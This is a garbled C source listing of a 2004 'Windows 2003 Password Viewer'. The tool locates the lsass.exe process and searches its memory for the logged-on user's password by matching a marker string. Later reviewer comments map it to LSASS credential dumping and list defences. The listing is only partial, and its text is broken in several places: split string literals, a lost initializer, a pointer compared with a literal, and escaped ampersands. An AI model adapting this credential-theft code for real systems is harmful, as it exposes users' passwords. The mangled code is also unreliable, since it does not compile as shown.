代码: //******************************************************************************** // Version: V1.0 // Coder: WinEggDrop // Date Release: 12/15/2004 // Purpose: To Demonstrate Searching Logon User Password On 2003 Box,The Method // Used Is Pretty Unwise,But This May Be The Only Way To Review The // Logon User's Password On Windows 2003. // Test PlatForm: Windows 2003 // Compiled On: VC++ 6.0 //******************************************************************************** #include #include #include
// Start address for the memory scan performed by FindPassword()/Search(). It is a fixed
// guess taken from the author's test box; as the trailing comment says, the bytes of
// interest may lie before it or well beyond it, so a hit is never guaranteed.
#define BaseAddress 0x002b5000 // The Base Memory Address To Search;The Password May Be Located Before The Address Or Far More From This Address,Which Makes The Result Unreliable
// File-scope buffer that receives whatever the scan treats as the logon password.
// MAX_PATH is the Win32 constant. The initializer is lost in this listing ("= ;" is not
// valid C); it was presumably "= {0}" -- TODO confirm against a clean copy.
char Password[MAX_PATH] = ; // Store The Found Password
// Prototypes (the lost line breaks leave them lexically inside the "//" comment below):
//   BOOL  FindPassword(DWORD PID)             -- reads lsass.exe memory for the given PID; not in this listing
//   int   Search(char *Buffer, const UINT nSize) -- pattern scan over a memory buffer; defined at the bottom
//   DWORD GetLsassPID(void)                   -- PID of lsass.exe, 0 on failure (main() treats 0 as failure); not shown
//   BOOL  Is2003(void)                        -- platform check used by main(); not shown
// None of the four is declared static, so they all have external linkage.
// Function ProtoType Declaration //------------------------------------------------------------------------------------------------------ BOOL FindPassword(DWORD PID); int Search(char *Buffer,const UINT nSize); DWORD GetLsassPID(); BOOL Is2003(); //------------------------------------------------------------------------------------------------------ // End Of Function ProtoType Declaration
//------------------------------------------------------------------------------------
// Purpose: Program entry point. Prints a banner, refuses to run unless Is2003()
//          reports a Windows 2003 box, looks up the lsass.exe process id with
//          GetLsassPID(), and hands it to FindPassword(), which (per the comments on
//          this page) searches that process's memory for the logon password.
// Return Type: int
//          -1 when Is2003() is false or GetLsassPID() returns 0
//           0 otherwise
// Note: FindPassword()'s BOOL result is ignored, so the exit status is 0 whether or
//          not anything was found; callers cannot tell success from failure.
// Note: Extraction artifacts in this listing: the "\n" at the end of each printf()
//          string has become a literal line break, the apostrophe in Can't has become
//          a double quote (ending the string literal early), and the lost line breaks
//          make the inline "//" comments swallow the code that followed them. The
//          text does not compile as shown; read the structure, not the bytes.
// Note (security): reading lsass.exe memory from another process is the classic
//          credential-access pattern (MITRE ATT&CK T1003.001, LSASS Memory). The
//          actual handle open and memory read presumably happen in FindPassword(),
//          which is not on this page; for defenders, a process handle to lsass.exe
//          with memory-read rights is the high-value detection event, and on
//          supported Windows versions LSA protection (RunAsPPL) and Credential Guard
//          reduce exposure to this technique.
//------------------------------------------------------------------------------------
int main() { DWORD PID = 0; printf("Windows 2003 Password Viewer V1.0 By WinEggDrop
");
if (!Is2003()) // Check Out If The Box Is 2003 { printf("The Program Can"t Only Run On Windows 2003 Platform
"); return -1; }
// GetLsassPID() is the only way the PID enters the program; 0 is its failure value.
PID = GetLsassPID(); // Get The Lsass.exe PID
if (PID == 0) // Fail To Get PID If Returning Zero { return -1; }
// Result of FindPassword() is discarded (see header note); the return 0 that follows
// is part of the code, not of the comment, in the un-garbled original.
FindPassword(PID); // Find The Password From Lsass.exe Memory return 0; } // End main()
//------------------------------------------------------------------------------------
// Review notes (the author's header and the function follow on the next line):
// - The visible body scans Buffer[0..nSize) for a byte 'L' and then, with strnicmp()
//   (MSVC's case-insensitive bounded compare; the conforming name is _strnicmp), checks
//   that "LocalSystem", "Remote", "Procedure" and "Call" follow, each separated by exactly
//   one terminator byte (hence the "+ 1" after every matched word). On a full match it
//   advances i past the marker and leaves the loop. A NULL Buffer returns -1.
// - nSize is an input (the byte count of Buffer), not an output; the "Out:" tag in the
//   original header is corrected below.
// - Extraction artifacts: "amp;" is an HTML-escaped "&", and `if (Buffer == "L")` compares
//   the pointer with a string literal, which is never true for a heap buffer; the intent is
//   almost certainly `Buffer[i] == 'L'`. The text does not compile as shown.
// - Out-of-bounds read: the for loop bounds only i, but the comparison chain reads up to
//   33 bytes starting at Buffer[i] (11+1+6+1+9+1+4), so a candidate 'L' near the end of
//   Buffer is compared against memory past nSize. The chain needs its own bound against
//   nSize before the first strnicmp().
// - Nothing after the for loop is visible here. j and Count are declared but unused in the
//   visible part, so the tail that uses them is presumably missing from this page; if the
//   function really ends here it falls off the end without a return value, which is
//   undefined behaviour when the caller uses the result -- TODO confirm against a clean copy.
// - Defender's view: this loop is byte-pattern matching over an already-read copy of
//   another process's memory; the observable event is the earlier lsass.exe memory read,
//   not this search.
//------------------------------------------------------------------------------------
//------------------------------------------------------------------------------------ // Purpose: Search The Memory & Try To Get The Password // Return Type: int // Parameters: // In: char *Buffer --> The Memory Buffer To Search // In: const UINT nSize --> The Size Of The Memory Buffer // Note: The Program Tries To Locate The Magic String "LocalSystem Remote Procedure", // Since The Password Is Near The Above Location,But It's Not Always True That // We Will Find The Magic String,Or Even We Find It,The Password May Be Located // At Some Other Place.We Only Look For Luck //------------------------------------------------------------------------------------ int Search(char *Buffer,const UINT nSize) { UINT OffSet = 0; UINT i = 0; UINT j = 0 ; UINT Count = 0; if (Buffer == NULL) { return -1; } for (i = 0 ; i < nSize ; i++) { /* The Below Is To Find The Magic String,Why So Complicated?That Will Thank MS.The Separation From Word To Word Is Not Separated With A Space,But With A Ending Character,So Any Search API Like strstr() Will Fail To Locate The Magic String,We Have To Do It Manually And Slowly */ if (Buffer == "L") { OffSet = 0; if (strnicmp(amp;Buffer[i + OffSet],"LocalSystem",strlen("LocalSystem")) == 0) { OffSet += strlen("LocalSystem") + 1; if (strnicmp(amp;Buffer[i + OffSet],"Remote",strlen("Remote")) == 0) { OffSet += strlen("Remote") + 1; if (strnicmp(amp;Buffer[i + OffSet],"Procedure",strlen("Procedure")) == 0) { OffSet += strlen("Procedure") + 1; if (strnicmp(amp;Buffer[i + OffSet],"Call",strlen("Call")) == 0) { i += OffSet; break; } } } } } }